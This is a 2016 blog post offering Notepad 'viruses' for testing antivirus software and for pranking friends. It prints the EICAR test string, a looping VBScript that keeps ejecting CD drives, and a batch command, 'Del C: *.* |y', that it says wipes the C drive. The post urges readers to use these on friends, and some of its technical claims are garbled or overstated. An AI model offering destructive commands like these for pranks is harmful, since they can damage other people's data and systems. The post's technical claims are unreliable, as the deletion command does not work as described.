How To Create Computer Virus in Less Than Minute

Today i'm here with the method to Create a Virus in Less Than 60 seconds. Today every second person is using a computer and almost every one of them knows about a virus. The virus is a malicious program that enters into the computer without your permission and can affect your data and operating system. Well, viruses are of different types as there are trojan horses and much more. However, have you ever thought about creating a virus? You can create one within seconds and it is possible with some simple methods that I am going to discuss in this post.


Many of you will think the methods must be on coding, but there is nothing like that. The tricks are based on the notepad. Just follow up the below steps for creating a virus within a minute.


#Create a Virus To Test Your Antivirus

You can easily test your Anti-virus program with a simple notepad trick.You can test your Anti-virus effectiveness using a simple notepad code.Follow the steps below :-

1. Open notepad.

2. Copy and paste the code below in notepad.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3. Save file as check-antivirus.bat or anything (*.bat)


If your anti-virus program detect the file a virus,then you sure that your anti-virus program is working properly. This is the harmless virus that is used to check the security level of your antivirus.


#Creating a Harmless Cdrom Virus

1. Open notepad.

2. Copy and paste the code below in notepad.

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

3. Save file as CD-ROM.vbs or anything (*.vbs)


When you double click on this file you will be really amazed at what this simple harmless virus can do. Your CD/DVD drives will get continuously ejected.

To stop this virus you need to open Task manager and select process tab and end the wscript.exe file.


#Creating a Dangerous Virus

1. Open notepad.

2. Copy and paste the code below in notepad.

@Echo off
Del C: *.* |y

3. Save file as Danger.bat or anything (*.bat)


If you running the file will delete the C drive completely and the operating system of the respective computer will get corrupted.

Note:- This method is only for knowledge purpose. Don’t try this in your computer as it will completely format your C drive.

All about How To Create a Virus in Less Than Minute. By this methods, you can easily create the harmful and harmless virus and can make your friends fool. If you have some more trick like this then share with us. Hope you like the post! Don’t forget to share this cool post with your friends.


How To Create Computer Virus in Less Than Minute How To Create Computer Virus in Less Than Minute Reviewed by Tech Ugly on Saturday, May 14, 2016 Rating: 5

No comments:

Most Viewed

Powered by Blogger.